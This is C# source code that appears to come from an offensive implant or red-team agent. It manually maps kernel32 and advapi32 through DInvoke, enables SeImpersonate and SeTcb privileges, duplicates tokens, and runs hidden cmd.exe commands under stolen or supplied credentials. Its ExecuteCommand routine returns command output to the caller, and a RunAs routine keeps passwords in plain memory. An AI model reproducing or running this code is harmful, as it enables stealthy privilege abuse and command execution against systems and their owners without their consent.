public static extern bool CreateProcessWithTokenW( IntPtr hToken, DInvoke.Win32.Kernel32.LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, DInvoke.Win32.Kernel32.CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref DInvoke.Win32.WinNT.StartupInfo lpStartupInfo, out DInvoke.Win32.Kernel32.ProcessInformation lpProcessInformation);
public static extern bool CreateProcessWithLogonW( string userName, string domain, string password, DInvoke.Win32.Kernel32.LogonFlags logonFlags, string applicationName, string commandLine, DInvoke.Win32.Kernel32.CreationFlags creationFlags, uint environment, string currentDirectory, ref DInvoke.Win32.WinNT.StartupInfo startupInfo, out DInvoke.Win32.Kernel32.ProcessInformation processInformation);
public static extern bool CreateProcessAsUserW( IntPtr hToken, string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, DInvoke.Win32.Kernel32.CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref DInvoke.Win32.WinNT.StartupInfo lpStartupInfo, out DInvoke.Win32.Kernel32.ProcessInformation lpProcessInformation);
internal static void RunAs(string domain, string user, string password) { var startupInfo = new DInvoke.Win32.WinNT.StartupInfo(); startupInfo.cb = Marshal.SizeOf(startupInfo); startupInfo.lpDesktop = ""; startupInfo.wShowWindow = 0; startupInfo.dwFlags |= 0x00000001; const DInvoke.Win32.Kernel32.LogonFlags logonFlags = new DInvoke.Win32.Kernel32.LogonFlags(); if (!CreateProcessWithLogonW(user, domain, password, logonFlags, null, @"c:\windows\system32\cmd.exe /Q /C hostname", 0, 0, null, ref startupInfo, out _)) { return; } TokenManager._method = 3; TokenManager._credentials[0] = user; TokenManager._credentials[1] = domain; TokenManager._credentials[2] = password; }
/////////////////////////// Commands execution /////////////////////////// public static string ExecuteCommand(string command, SysCallManager sysCall) { var output = ""; if (TokenManager._token == IntPtr.Zero && TokenManager._method == 0) { var process = new Process(); var startInfo = new ProcessStartInfo { WindowStyle = ProcessWindowStyle.Hidden, FileName = @"C:\windows\system32\cmd.exe", Arguments = "/C " + command, RedirectStandardOutput = true, RedirectStandardError = true, UseShellExecute = false }; process.StartInfo = startInfo; process.Start(); output = process.StandardOutput.ReadToEnd(); if (output == "") { output = string.Concat("ERR:", process.StandardError.ReadToEnd()); } process.WaitForExit(); process.Close(); } else { var outRead = IntPtr.Zero; var outWrite = IntPtr.Zero; DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); var saAttr = new DInvoke.Win32.Kernel32.SecurityAttributes { nLength = Marshal.SizeOf(typeof(DInvoke.Win32.Kernel32.SecurityAttributes)), bInheritHandle = true, lpSecurityDescriptor = IntPtr.Zero }; object[] createPipe = { outRead, outWrite, saAttr, 0 }; var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "CreatePipe", typeof(DInvoke.Win32.DELEGATES.CreatePipe), createPipe); outRead = (IntPtr)createPipe[0]; outWrite = (IntPtr)createPipe[1]; saAttr = (DInvoke.Win32.Kernel32.SecurityAttributes)createPipe[2]; var startupInfo = new DInvoke.Win32.WinNT.StartupInfo(); startupInfo.cb = Marshal.SizeOf(startupInfo); startupInfo.lpDesktop = ""; startupInfo.hStdOutput = outWrite; startupInfo.hStdError = outWrite; startupInfo.wShowWindow = 0; startupInfo.dwFlags |= 0x00000101; var l = new DInvoke.Win32.Kernel32.LogonFlags(); switch (TokenManager._method) { case 1: CreateProcessAsUserW(TokenManager._token, null, @"c:\windows\system32\cmd.exe /Q /C" + @command, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out _); break; case 2: CreateProcessWithTokenW(TokenManager._token, l, null, @"c:\windows\system32\cmd.exe /Q /C" + @command, 0, IntPtr.Zero, null, ref startupInfo, out _); break; default: CreateProcessWithLogonW(TokenManager._credentials[0], TokenManager._credentials[1], TokenManager._credentials[2], l, null, @"c:\windows\system32\cmd.exe /Q /C" + command, 0, 0, null, ref startupInfo, out _); break; } var buf = new byte[100]; var dwRead = 0; Thread.Sleep(500); while (true) { var bSuccess = ReadFile(outRead, buf, 100, ref dwRead, IntPtr.Zero); output = string.Concat(output, Encoding.Default.GetString(buf)); if (!bSuccess || dwRead < 100) { break; } } CloseHandle(outRead); CloseHandle(outWrite); } return(output); }
public static void Start() { var sysCall = new SysCallManager(); try { var token = WindowsIdentity.GetCurrent().Token; var newToken = IntPtr.Zero; var privileges = new List <string> { "SeImpersonatePrivilege", "SeTcbPrivilege", "SeAssignPrimaryTokenPrivilege", "SeIncreaseQuotaPrivilege" }; var currentToken = IntPtr.Zero; GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges, out currentToken, sysCall); EnablePrivileges(currentToken, privileges, sysCall); CloseHandle(currentToken); const DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS tokenAccess = DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenQuery | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAssignPrimary | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenDuplicate | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustDefault | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustSessionId; DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\advapi32.dll"); object[] duplicateToken = { token, tokenAccess, IntPtr.Zero, DInvoke.Win32.WinNT._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, DInvoke.Win32.WinNT.TOKEN_TYPE.TokenPrimary, newToken }; bool status = (bool)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "DuplicateTokenEx", typeof(DInvoke.Win32.DELEGATES.DuplicateTokenEx), duplicateToken); if (!status) { return; } else { newToken = (IntPtr)duplicateToken[5]; } var startupInfo = new DInvoke.Win32.WinNT.StartupInfo(); startupInfo.cb = Marshal.SizeOf(startupInfo); startupInfo.lpDesktop = ""; startupInfo.wShowWindow = 0; startupInfo.dwFlags |= 0x00000001; const DInvoke.Win32.Kernel32.LogonFlags logonFlags = new DInvoke.Win32.Kernel32.LogonFlags(); if (CreateProcessAsUserW(newToken, null, @"c:\windows\system32\cmd.exe /Q /C whoami && exit", IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out _)) { TokenManager._token = newToken; TokenManager._method = 1; } else { if (!CreateProcessWithTokenW(newToken, logonFlags, null, @"c:\windows\system32\cmd.exe /Q /C whoami && exit", 0, IntPtr.Zero, null, ref startupInfo, out _)) { return; } TokenManager._token = newToken; TokenManager._method = 2; } } catch { } }
public static void DetermineImpersonationMethod(IntPtr token, DInvoke.Win32.Kernel32.LogonFlags l, DInvoke.Win32.WinNT.StartupInfo startupInfo, out DInvoke.Win32.Kernel32.ProcessInformation processInfo) { if (CreateProcessAsUserW(token, null, @"c:\windows\system32\cmd.exe /Q /C hostname && exit", IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo)) { TokenManager._method = 1; } else if (CreateProcessWithTokenW(token, l, null, @"c:\windows\system32\cmd.exe /Q /C hostname && exit", 0, IntPtr.Zero, null, ref startupInfo, out processInfo)) { TokenManager._method = 2; } }